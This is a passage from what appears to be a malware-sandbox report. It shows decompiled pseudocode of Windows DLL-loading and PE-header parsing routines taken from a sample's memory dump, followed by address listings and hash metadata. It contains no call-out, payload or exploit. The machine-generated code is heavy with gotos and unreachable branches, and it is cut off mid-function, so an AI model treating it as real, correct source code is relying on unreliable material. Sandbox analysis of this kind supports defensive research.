									_t351 =  *0xb785f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x632f38
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00A9FFB0(_t287, _t353, 0xb784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00ADCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00A96600(0xb752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00A97926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xb7b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00B0E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xb78472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xb7b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xb7b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00AA2280(_t250, 0xb784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00AC3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00A9FFB0(_t293, _t353, 0xb784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00AC37F5(_t353, 0);
																}
																E00AC0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00AB9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00AB02D6(_t174);
																}
																L00AA77F0( *0xb77b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00ABC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00A9EC7F(_t353);
										L00AB19B8(_t287, 0, _t353, 0);
										_t200 = E00A8F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xb7b2f8 |  *0xb7b2fc) == 0 || ( *0xb7b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00ACB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xb7b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00B36B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00B36AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00A9E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00A9EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00AC9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00A9E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00A98F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00AC3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                    0x00a9d5f2
                                                    0x00a9d5f5
                                                    0x00a9d5f5
                                                    0x00a9d5fd
                                                    0x00a9d600
                                                    0x00a9d60a
                                                    0x00a9d60d
                                                    0x00a9d617
                                                    0x00a9d61d
                                                    0x00a9d627
                                                    0x00a9d62e
                                                    0x00a9d911
                                                    0x00a9d913
                                                    0x00000000
                                                    0x00a9d919
                                                    0x00a9d919
                                                    0x00a9d919
                                                    0x00a9d634
                                                    0x00a9d634
                                                    0x00a9d634
                                                    0x00a9d634
                                                    0x00a9d640
                                                    0x00a9d8bf
                                                    0x00000000
                                                    0x00a9d646
                                                    0x00a9d646
                                                    0x00a9d64d
                                                    0x00a9d652
                                                    0x00aeb2fc
                                                    0x00aeb2fc
                                                    0x00aeb302
                                                    0x00aeb33b
                                                    0x00aeb341
                                                    0x00000000
                                                    0x00aeb304
                                                    0x00aeb304
                                                    0x00aeb319
                                                    0x00aeb31e
                                                    0x00aeb324
                                                    0x00aeb326
                                                    0x00aeb332
                                                    0x00aeb347
                                                    0x00aeb34c
                                                    0x00aeb351
                                                    0x00aeb35a
                                                    0x00000000
                                                    0x00aeb328
                                                    0x00aeb328
                                                    0x00000000
                                                    0x00aeb328
                                                    0x00aeb326
                                                    0x00a9d658
                                                    0x00a9d658
                                                    0x00a9d65b
                                                    0x00a9d665
                                                    0x00000000
                                                    0x00a9d66b
                                                    0x00a9d66b
                                                    0x00a9d66b
                                                    0x00a9d66b
                                                    0x00a9d66d
                                                    0x00a9d672
                                                    0x00a9d67a
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9d680
                                                    0x00a9d686
                                                    0x00a9d8ce
                                                    0x00a9d8d4
                                                    0x00a9d8dd
                                                    0x00a9d8e0
                                                    0x00a9d68c
                                                    0x00a9d691
                                                    0x00a9d69d
                                                    0x00a9d6a2
                                                    0x00a9d6a7
                                                    0x00a9d6b0
                                                    0x00a9d6b5
                                                    0x00a9d6e0
                                                    0x00a9d6b7
                                                    0x00a9d6b7
                                                    0x00a9d6b9
                                                    0x00a9d6b9
                                                    0x00a9d6bb
                                                    0x00a9d6bd
                                                    0x00a9d6ce
                                                    0x00a9d6d0
                                                    0x00a9d6d2
                                                    0x00aeb363
                                                    0x00aeb365
                                                    0x00000000
                                                    0x00aeb36b
                                                    0x00000000
                                                    0x00aeb36b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9d6bf
                                                    0x00a9d6bf
                                                    0x00a9d6e5
                                                    0x00a9d6e7
                                                    0x00a9d6e9
                                                    0x00a9d6ec
                                                    0x00a9d6ec
                                                    0x00a9d6ef
                                                    0x00a9d6f5
                                                    0x00a9d6f9
                                                    0x00a9d6fb
                                                    0x00a9d6fd
                                                    0x00a9d701
                                                    0x00a9d703
                                                    0x00a9d70a
                                                    0x00a9d70a
                                                    0x00a9d701
                                                    0x00a9d710
                                                    0x00a9d710
                                                    0x00a9d6c1
                                                    0x00a9d6c1
                                                    0x00a9d6c6
                                                    0x00aeb36d
                                                    0x00aeb36f
                                                    0x00000000
                                                    0x00aeb375
                                                    0x00aeb375
                                                    0x00aeb375
                                                    0x00000000
                                                    0x00aeb375
                                                    0x00000000
                                                    0x00a9d6cc
                                                    0x00a9d6d8
                                                    0x00a9d6d8
                                                    0x00a9d6d8
                                                    0x00000000
                                                    0x00a9d6c6
                                                    0x00a9d6bf
                                                    0x00000000
                                                    0x00a9d6da
                                                    0x00a9d6da
                                                    0x00a9d716
                                                    0x00a9d71b
                                                    0x00a9d720
                                                    0x00a9d726
                                                    0x00a9d726
                                                    0x00a9d72d
                                                    0x00000000
                                                    0x00a9d733
                                                    0x00a9d739
                                                    0x00a9d742
                                                    0x00a9d750
                                                    0x00a9d758
                                                    0x00a9d764
                                                    0x00a9d776
                                                    0x00a9d77a
                                                    0x00a9d783
                                                    0x00a9d928
                                                    0x00a9d92c
                                                    0x00a9d93d
                                                    0x00a9d944
                                                    0x00a9d94f
                                                    0x00a9d954
                                                    0x00a9d956
                                                    0x00a9d95f
                                                    0x00a9d961
                                                    0x00a9d973
                                                    0x00a9d973
                                                    0x00a9d956
                                                    0x00a9d944
                                                    0x00a9d92c
                                                    0x00a9d78b
                                                    0x00aeb394
                                                    0x00a9d791
                                                    0x00a9d798
                                                    0x00aeb3a3
                                                    0x00aeb3bb
                                                    0x00aeb3bb
                                                    0x00a9d7a5
                                                    0x00a9d866
                                                    0x00a9d870
                                                    0x00a9d892
                                                    0x00a9d898
                                                    0x00a9d89e
                                                    0x00a9d8a0
                                                    0x00a9d8a6
                                                    0x00a9d8ac
                                                    0x00a9d8ae
                                                    0x00a9d8b4
                                                    0x00a9d8b4
                                                    0x00a9d8ae
                                                    0x00a9d7a5
                                                    0x00a9d78b
                                                    0x00a9d7b1
                                                    0x00aeb3c5
                                                    0x00aeb3c5
                                                    0x00a9d7c3
                                                    0x00a9d7ca
                                                    0x00a9d7e5
                                                    0x00a9d7eb
                                                    0x00a9d8eb
                                                    0x00a9d8ed
                                                    0x00000000
                                                    0x00a9d8f3
                                                    0x00a9d8f3
                                                    0x00a9d8f3
                                                    0x00000000
                                                    0x00a9d8ed
                                                    0x00a9d7cc
                                                    0x00a9d7cc
                                                    0x00a9d7d2
                                                    0x00000000
                                                    0x00a9d7d4
                                                    0x00a9d7d4
                                                    0x00a9d7d7
                                                    0x00a9d7df
                                                    0x00aeb3d4
                                                    0x00aeb3d9
                                                    0x00aeb3dc
                                                    0x00aeb3dc
                                                    0x00aeb3df
                                                    0x00aeb3e2
                                                    0x00aeb468
                                                    0x00aeb46d
                                                    0x00aeb46f
                                                    0x00aeb46f
                                                    0x00aeb475
                                                    0x00a9d8f8
                                                    0x00a9d8f9
                                                    0x00a9d8fd
                                                    0x00aeb3e8
                                                    0x00aeb3e8
                                                    0x00aeb3eb
                                                    0x00aeb3ed
                                                    0x00000000
                                                    0x00aeb3ef
                                                    0x00aeb3ef
                                                    0x00aeb3f1
                                                    0x00aeb3f4
                                                    0x00aeb3fe
                                                    0x00aeb404
                                                    0x00aeb409
                                                    0x00aeb40e
                                                    0x00aeb410
                                                    0x00aeb410
                                                    0x00aeb414
                                                    0x00aeb414
                                                    0x00aeb41b
                                                    0x00aeb420
                                                    0x00aeb423
                                                    0x00aeb425
                                                    0x00aeb427
                                                    0x00aeb42a
                                                    0x00aeb42d
                                                    0x00aeb42d
                                                    0x00aeb42a
                                                    0x00aeb432
                                                    0x00aeb436
                                                    0x00aeb438
                                                    0x00aeb43b
                                                    0x00aeb43b
                                                    0x00aeb449
                                                    0x00aeb44e
                                                    0x00aeb454
                                                    0x00aeb458
                                                    0x00aeb458
                                                    0x00aeb45d
                                                    0x00000000
                                                    0x00aeb45d
                                                    0x00aeb3ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9d7df
                                                    0x00a9d7d2
                                                    0x00a9d7ca
                                                    0x00aeb37c
                                                    0x00aeb37e
                                                    0x00aeb385
                                                    0x00aeb38a
                                                    0x00000000
                                                    0x00aeb38a
                                                    0x00a9d742
                                                    0x00a9d7f1
                                                    0x00a9d7f8
                                                    0x00aeb49b
                                                    0x00aeb49b
                                                    0x00a9d800
                                                    0x00a9d837
                                                    0x00a9d843
                                                    0x00a9d845
                                                    0x00a9d847
                                                    0x00a9d84a
                                                    0x00a9d84b
                                                    0x00a9d84e
                                                    0x00a9d857
                                                    0x00a9d818
                                                    0x00a9d824
                                                    0x00a9d831
                                                    0x00aeb4a5
                                                    0x00aeb4ab
                                                    0x00aeb4b3
                                                    0x00aeb4b8
                                                    0x00aeb4bb
                                                    0x00000000
                                                    0x00aeb4c1
                                                    0x00aeb4c1
                                                    0x00aeb4c8
                                                    0x00000000
                                                    0x00aeb4ce
                                                    0x00aeb4d4
                                                    0x00aeb4e1
                                                    0x00aeb4e3
                                                    0x00aeb4e5
                                                    0x00000000
                                                    0x00aeb4eb
                                                    0x00aeb4f0
                                                    0x00aeb4f2
                                                    0x00a9dac9
                                                    0x00a9dacc
                                                    0x00a9dacf
                                                    0x00a9dad1
                                                    0x00a9dd78
                                                    0x00a9dd78
                                                    0x00a9dcf2
                                                    0x00000000
                                                    0x00a9dad7
                                                    0x00a9dad9
                                                    0x00a9dadb
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9dae1
                                                    0x00a9dae1
                                                    0x00a9dae4
                                                    0x00a9dae6
                                                    0x00aeb4f9
                                                    0x00aeb4f9
                                                    0x00aeb500
                                                    0x00a9daec
                                                    0x00a9daec
                                                    0x00a9daf5
                                                    0x00a9daf8
                                                    0x00a9dafb
                                                    0x00a9db03
                                                    0x00a9db11
                                                    0x00a9db16
                                                    0x00a9db19
                                                    0x00a9db1b
                                                    0x00aeb52c
                                                    0x00aeb531
                                                    0x00aeb534
                                                    0x00a9db21
                                                    0x00a9db21
                                                    0x00a9db24
                                                    0x00a9dcd9
                                                    0x00a9dce2
                                                    0x00a9dce5
                                                    0x00a9dd6a
                                                    0x00a9dd6d
                                                    0x00000000
                                                    0x00a9dd73
                                                    0x00aeb51a
                                                    0x00aeb51c
                                                    0x00aeb51f
                                                    0x00aeb524
                                                    0x00000000
                                                    0x00aeb524
                                                    0x00a9dce7
                                                    0x00a9dce7
                                                    0x00a9dce7
                                                    0x00000000
                                                    0x00a9dce7
                                                    0x00000000
                                                    0x00a9db2a
                                                    0x00a9db2c
                                                    0x00a9db31
                                                    0x00a9db33
                                                    0x00a9db36
                                                    0x00a9db39
                                                    0x00a9db3b
                                                    0x00a9db66
                                                    0x00a9db66
                                                    0x00a9db3d
                                                    0x00a9db3d
                                                    0x00a9db3e
                                                    0x00a9db46
                                                    0x00a9db47
                                                    0x00a9db49
                                                    0x00a9db4c
                                                    0x00a9db53
                                                    0x00a9db55
                                                    0x00a9db58
                                                    0x00a9db5a
                                                    0x00aeb50a
                                                    0x00aeb50f
                                                    0x00aeb512
                                                    0x00a9db60
                                                    0x00a9db60
                                                    0x00a9db63
                                                    0x00a9db63
                                                    0x00000000
                                                    0x00a9db63
                                                    0x00a9db5a
                                                    0x00a9db3b
                                                    0x00a9db24
                                                    0x00a9db69
                                                    0x00a9db69
                                                    0x00a9db6c
                                                    0x00a9db6f
                                                    0x00a9db74
                                                    0x00aeb557
                                                    0x00aeb557
                                                    0x00aeb55e
                                                    0x00a9db7a
                                                    0x00a9db7c
                                                    0x00a9db7f
                                                    0x00a9db82
                                                    0x00a9db85
                                                    0x00000000
                                                    0x00a9db8b
                                                    0x00a9db8b
                                                    0x00a9db8d
                                                    0x00a9db9b
                                                    0x00a9db9b
                                                    0x00a9db9d
                                                    0x00a9dba0
                                                    0x00a9dba2
                                                    0x00a9dba4
                                                    0x00a9dba7
                                                    0x00a9dba9
                                                    0x00a9dbae
                                                    0x00a9dbae
                                                    0x00a9dbb1
                                                    0x00a9dbb4
                                                    0x00a9dbb4
                                                    0x00a9dbb7
                                                    0x00a9dbba
                                                    0x00a9dcd2
                                                    0x00a9dcd4
                                                    0x00000000
                                                    0x00a9dbc0
                                                    0x00a9dbc0
                                                    0x00a9dbd2
                                                    0x00a9dbd7
                                                    0x00a9dbda
                                                    0x00a9dbdd
                                                    0x00a9dbdf
                                                    0x00000000
                                                    0x00a9dbe5
                                                    0x00a9dbe5
                                                    0x00a9dbee
                                                    0x00a9dbf1
                                                    0x00aeb541
                                                    0x00aeb544
                                                    0x00000000
                                                    0x00aeb546
                                                    0x00aeb546
                                                    0x00000000
                                                    0x00aeb546
                                                    0x00a9dbf7
                                                    0x00a9dbf7
                                                    0x00a9dbfd
                                                    0x00a9dbfd
                                                    0x00a9dbff
                                                    0x00a9dc0b
                                                    0x00a9dc15
                                                    0x00a9dc1b
                                                    0x00a9dc1d
                                                    0x00a9dc21
                                                    0x00a9dc21
                                                    0x00a9dc23
                                                    0x00a9dc23
                                                    0x00a9dc26
                                                    0x00a9dc29
                                                    0x00a9dc2b
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9dc31
                                                    0x00a9dc34
                                                    0x00a9dc36
                                                    0x00a9dcbf
                                                    0x00a9dcbf
                                                    0x00a9dcc2
                                                    0x00000000
                                                    0x00a9dc3c
                                                    0x00a9dc41
                                                    0x00a9dc43
                                                    0x00000000
                                                    0x00a9dc45
                                                    0x00a9dc45
                                                    0x00a9dc47
                                                    0x00000000
                                                    0x00a9dc4d
                                                    0x00a9dc4d
                                                    0x00a9dc50
                                                    0x00a9dc52
                                                    0x00a9dc55
                                                    0x00a9dcfa
                                                    0x00a9dcfe
                                                    0x00a9dd08
                                                    0x00a9dd0a
                                                    0x00a9dd0c
                                                    0x00000000
                                                    0x00a9dd12
                                                    0x00a9dd15
                                                    0x00a9dd2d
                                                    0x00a9dd2f
                                                    0x00a9dd32
                                                    0x00a9dd35
                                                    0x00000000
                                                    0x00a9dd35
                                                    0x00a9dc5b
                                                    0x00a9dc5b
                                                    0x00a9dc5e
                                                    0x00a9dc61
                                                    0x00a9dc64
                                                    0x00a9dc67
                                                    0x00a9dc67
                                                    0x00a9dc6a
                                                    0x00a9dc6c
                                                    0x00a9dc8e
                                                    0x00a9dc8e
                                                    0x00a9dc91
                                                    0x00a9dc93
                                                    0x00a9dcce
                                                    0x00a9dcce
                                                    0x00a9dc95
                                                    0x00a9dc9c
                                                    0x00a9dc6e
                                                    0x00a9dc72
                                                    0x00a9dc75
                                                    0x00a9dc77
                                                    0x00a9dc79
                                                    0x00aeb551
                                                    0x00aeb551
                                                    0x00000000
                                                    0x00a9dc7f
                                                    0x00a9dc7f
                                                    0x00a9dc81
                                                    0x00000000
                                                    0x00a9dc83
                                                    0x00a9dc86
                                                    0x00a9dc88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9dc88
                                                    0x00a9dc81
                                                    0x00a9dc79
                                                    0x00a9dc6c
                                                    0x00a9dc55
                                                    0x00a9dc47
                                                    0x00a9dc43
                                                    0x00000000
                                                    0x00a9dc36
                                                    0x00a9dc23
                                                    0x00000000
                                                    0x00a9dbff
                                                    0x00a9dbf1
                                                    0x00a9dbdf
                                                    0x00a9db8f
                                                    0x00a9db92
                                                    0x00a9db95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9db95
                                                    0x00a9db8d
                                                    0x00a9db85
                                                    0x00a9db74
                                                    0x00a9dc9f
                                                    0x00a9dca2
                                                    0x00a9dcb0
                                                    0x00a9dcb0
                                                    0x00a9dad1
                                                    0x00aeb4e5
                                                    0x00aeb4c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9d831
                                                    0x00000000
                                                    0x00a9d800
                                                    0x00aeb47f
                                                    0x00aeb485
                                                    0x00000000
                                                    0x00aeb485
                                                    0x00a9d665
                                                    0x00a9d652
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39aa5de7766145afe23c51dfa90e6b8a4de42f69af5c8249fd7d9d5d169b7b94
                                                    • Instruction ID: c0ca3bf3b950b8490c4b29e82f19d92261e87d9d305669020556e0e92845b589
                                                    • Opcode Fuzzy Hash: 39aa5de7766145afe23c51dfa90e6b8a4de42f69af5c8249fd7d9d5d169b7b94
                                                    • Instruction Fuzzy Hash: A5E1AF30B003598FDF24DF29C985BAAB7F2BF45304F1441A9E909AB292DB749D81CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9849B Relevance: .3, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E00A9849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xb5f9c0);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0xb77b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00A9CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
